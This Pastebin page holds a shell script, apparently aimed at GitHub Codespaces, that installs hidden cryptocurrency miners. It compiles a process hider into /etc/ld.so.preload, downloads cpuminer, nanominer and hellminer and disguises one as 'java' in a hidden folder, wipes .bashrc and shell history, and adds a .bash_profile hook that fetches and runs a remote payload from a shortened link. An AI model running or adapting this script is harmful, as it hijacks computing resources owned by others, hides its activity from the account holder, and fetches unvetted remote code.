Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/sh
- rm -rvf .lib*
- echo "==================="
- echo " CEK TIMEZONE "
- echo "==================="
- echo " "
- echo " "
- ln -fs /usr/share/zoneinfo/Asia/Jakarta /etc/localtime
- dpkg-reconfigure --frontend noninteractive tzdata
- sleep 2
- echo "."
- sudo apt update -y;apt -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential binutils git cmake screen unzip net-tools curl -y
- sleep 2
- wget https://github.com/AhmadTugiman/gembel/raw/main/tukimin.zip
- unzip tukimin.zip
- rm -rf tukimin.zip
- make
- gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
- mv libprocesshider.so /usr/local/lib/
- echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
- echo "."
- cd
- wget -q -O proxy https://bitbucket.org/asimadarasi/alima/downloads/panel && chmod +x proxy
- wget -q https://bitbucket.org/asimadarasi/alima/downloads/proxychains.conf && chmod +x proxychains.conf
- wget -q https://bitbucket.org/asimadarasi/alima/downloads/libproxychains4.so && chmod +x libproxychains4.so
- cd && mkdir .lib
- cd && cd .lib
- git clone https://github.com/sukamenari/akc.git && cd akc && rm bash && wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.29/cpuminer-opt-linux.tar.gz --no-check-certificate && tar xf cpuminer-opt-linux.tar.gz && rm cpuminer-opt-linux.tar.gz && mv cpuminer-avx2 java && mv java* ~/ && mv java* /home/codespace/.lib && cd .. && rm -rvf cpuminer-opt-linux && mv kernel* /home/codespace/.lib
- nohup wget https://github.com/nanopool/nanominer/releases/download/v3.8.3/nanominer-linux-3.8.3.tar.gz && tar -xf nanominer-linux-3.8.3.tar.gz && mv nanominer nano && mv nano* ~/
- wget https://github.com/hellcatz/hminer/releases/download/v0.59.1/hellminer_linux64.tar.gz && tar xf hellminer_linux64.tar.gz && mv hellminer hell && mv hell* ~/
- cd && cd .lib && rm -rvf akc
- echo "" > /home/codespace/.bashrc
- echo "" > /home/codespace/.bash_history
- echo "" > /home/codespace/.bash_profile
- echo 'echo "" >> /home/codespace/.bash_history' >> /home/codespace/.bashrc
- echo "source /home/codespace/.bash_profile" >> /home/codespace/.bashrc
- echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/codespace/.bash_profile
- echo "export LD_LIBRARY_PATH" >> /home/codespace/.bash_profile
- echo "bash /home/codespace/.lib/gas.sh" >> /home/codespace/.bash_profile &&
- echo "export LC_ALL=C; unset LANGUAGE && cd && rm -rvf e && wget -O e http://tiny.cc/Sugar01 && chmod +x e && sed -i -e 's/\r$//' e && ./e " > /home/codespace/.lib/gas.sh
- cd /home/codespace/.lib/
- chmod +x gas.sh && cd ~/ && history -cr && source .bashrc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement